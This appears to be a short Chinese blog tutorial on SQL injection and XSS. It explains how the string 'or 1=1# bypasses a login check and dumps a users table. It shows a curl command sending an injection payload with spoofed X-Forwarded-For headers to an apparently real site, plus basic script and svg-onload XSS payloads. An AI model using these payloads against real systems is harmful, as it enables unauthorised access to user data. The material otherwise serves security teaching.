sql注入、xss语句测试

本文探讨了SQL注入和XSS跨站脚本攻击的原理。通过示例,展示了如何利用‘or1=1#’进行SQL注入,绕过登录验证,获取数据库中的所有用户信息。同时,也演示了XSS攻击的不同形式,如利用头信息和URL注入恶意脚本,提醒读者关注网络安全,防范此类攻击。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

d:\Users\Administrator\Desktop\curl-7.80.0-win64-mingw\bin>curl.exe -Iv http://www.bj2342.cn/?id=1'or'1'='1 -H "X-Forwarded-For:1.1.1.1" -H "X-Forwarded-For:2.2.2.2"

select * from users where username=’’ or 1=1#’ and password=balabala

我们分析下语义,在SQL语法中 # 是注释符,所以后面的语句都会杯注释掉,那么上面的语句就等价于

select * from users where username=’’ or 1=1

我们知道SQL语句中where相当于判断语句,并且是由 or 连接的,所以 username=’’ 和 1=1 中有一个为真就为真。1=1肯定为真,所以语句又等价于

select * from users

这个语句的作用是爆出表中的所有字段。

也就是说我们用 ‘or 1=1# 这么一个字符串就可以绕开登陆的密码,直接进入程序。当然这仅限于那些可以被注入的程序或者网页噢
————————————————

XSS模拟

d:\Users\Administrator\Desktop\curl-7.80.0-win64-mingw\bin>curl -iH "XSS: <svg onload=alert(1)>" http://xxx.xxx.com

http://www.example.com/<script>alert('hello');</script>

http://www.example.com/x=<script>alert(1)</script>

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值